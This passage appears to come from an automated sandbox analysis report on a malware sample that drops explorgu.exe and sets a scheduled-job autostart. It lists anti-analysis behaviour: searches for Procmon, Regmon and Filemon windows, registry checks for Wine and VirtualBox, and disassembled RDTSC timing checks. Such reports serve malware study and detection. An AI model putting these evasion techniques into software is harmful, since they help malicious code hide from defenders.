Source: C:\Users\user\Desktop\wIaKimJFke.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Window searched: window name: Regmonclass	Jump to behavior

Creates job files (autostart)

Source: C:\Users\user\Desktop\wIaKimJFke.exe

File created: C:\Windows\Tasks\explorgu.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Users\user\Desktop\wIaKimJFke.exe

Evasive API call chain: GetPEB, DecisionNodes, ExitProcess

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\wIaKimJFke.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 54BAE0 second address: 54BAE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6C6104 second address: 6C613E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FED7550886Ch 0x0000000a pop ecx 0x0000000b pushad 0x0000000c jmp 00007FED75508879h 0x00000011 push esi 0x00000012 pushad 0x00000013 popad 0x00000014 push esi 0x00000015 pop esi 0x00000016 pop esi 0x00000017 push esi 0x00000018 jl 00007FED75508866h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6C524B second address: 6C525F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FED74F3E51Eh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6C5383 second address: 6C539A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jo 00007FED75508866h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d jne 00007FED75508866h 0x00000013 pop edx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6C57D6 second address: 6C57DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6C57DC second address: 6C57F2 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FED75508871h 0x00000008 jmp 00007FED7550886Bh 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6C57F2 second address: 6C580A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FED74F3E516h 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jno 00007FED74F3E516h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6C580A second address: 6C581F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FED75508870h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6C80BF second address: 6C8114 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E529h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov dx, di 0x0000000f push 00000000h 0x00000011 jmp 00007FED74F3E523h 0x00000016 push 7316E533h 0x0000001b push esi 0x0000001c pushad 0x0000001d jmp 00007FED74F3E524h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6C8114 second address: 6C818A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 xor dword ptr [esp], 7316E5B3h 0x0000000d mov dx, cx 0x00000010 push 00000003h 0x00000012 call 00007FED7550886Bh 0x00000017 mov dword ptr [ebp+122D1C56h], ecx 0x0000001d pop esi 0x0000001e push 00000000h 0x00000020 xor ecx, 67827052h 0x00000026 pushad 0x00000027 cld 0x00000028 push eax 0x00000029 mov di, 5C8Fh 0x0000002d pop ecx 0x0000002e popad 0x0000002f push 00000003h 0x00000031 push 00000000h 0x00000033 push edi 0x00000034 call 00007FED75508868h 0x00000039 pop edi 0x0000003a mov dword ptr [esp+04h], edi 0x0000003e add dword ptr [esp+04h], 00000018h 0x00000046 inc edi 0x00000047 push edi 0x00000048 ret 0x00000049 pop edi 0x0000004a ret 0x0000004b add dword ptr [ebp+122D1D01h], edx 0x00000051 push 6552850Dh 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 0x00000059 pushad 0x0000005a popad 0x0000005b jmp 00007FED7550886Eh 0x00000060 popad 0x00000061 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6C8361 second address: 6C8387 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push esi 0x00000006 push edx 0x00000007 pop edx 0x00000008 pop esi 0x00000009 popad 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push ebx 0x0000000f pushad 0x00000010 jns 00007FED74F3E516h 0x00000016 jng 00007FED74F3E516h 0x0000001c popad 0x0000001d pop ebx 0x0000001e mov eax, dword ptr [eax] 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6C8387 second address: 6C838B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6C838B second address: 6C8391 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6C8391 second address: 6C83D1 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FED75508868h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 jc 00007FED7550886Eh 0x00000016 jng 00007FED75508868h 0x0000001c pop eax 0x0000001d mov si, 5717h 0x00000021 lea ebx, dword ptr [ebp+1244FF8Dh] 0x00000027 and cx, 05ECh 0x0000002c push eax 0x0000002d pushad 0x0000002e jmp 00007FED7550886Dh 0x00000033 pushad 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6C8446 second address: 6C8460 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FED74F3E521h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6C8460 second address: 6C8464 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6C8464 second address: 6C84A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jnl 00007FED74F3E51Ch 0x0000000f ja 00007FED74F3E516h 0x00000015 jmp 00007FED74F3E51Dh 0x0000001a popad 0x0000001b mov eax, dword ptr [esp+04h] 0x0000001f pushad 0x00000020 pushad 0x00000021 jc 00007FED74F3E516h 0x00000027 jc 00007FED74F3E516h 0x0000002d popad 0x0000002e push eax 0x0000002f push edx 0x00000030 jnp 00007FED74F3E516h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6C84A2 second address: 6C84B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d js 00007FED75508866h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6C84B5 second address: 6C84B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6C84B9 second address: 6C84BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6C84BF second address: 6C84C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FED74F3E516h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6C84C9 second address: 6C84CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6C84CD second address: 6C8517 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c jng 00007FED74F3E51Ah 0x00000012 pop eax 0x00000013 jbe 00007FED74F3E51Ch 0x00000019 mov ecx, dword ptr [ebp+122D3724h] 0x0000001f push 00000003h 0x00000021 xor dword ptr [ebp+122D17D4h], eax 0x00000027 push 00000000h 0x00000029 jno 00007FED74F3E51Bh 0x0000002f push 00000003h 0x00000031 sub dword ptr [ebp+122D1DC9h], edx 0x00000037 push 9A31F0A4h 0x0000003c pushad 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6C8517 second address: 6C851B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6C851B second address: 6C8578 instructions: 0x00000000 rdtsc 0x00000002 je 00007FED74F3E516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FED74F3E51Fh 0x0000000f popad 0x00000010 add dword ptr [esp], 25CE0F5Ch 0x00000017 ja 00007FED74F3E51Ch 0x0000001d lea ebx, dword ptr [ebp+1244FF98h] 0x00000023 sub dword ptr [ebp+122D1820h], edi 0x00000029 xchg eax, ebx 0x0000002a jnc 00007FED74F3E528h 0x00000030 jmp 00007FED74F3E522h 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 js 00007FED74F3E518h 0x0000003e push ecx 0x0000003f pop ecx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6DB477 second address: 6DB47B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
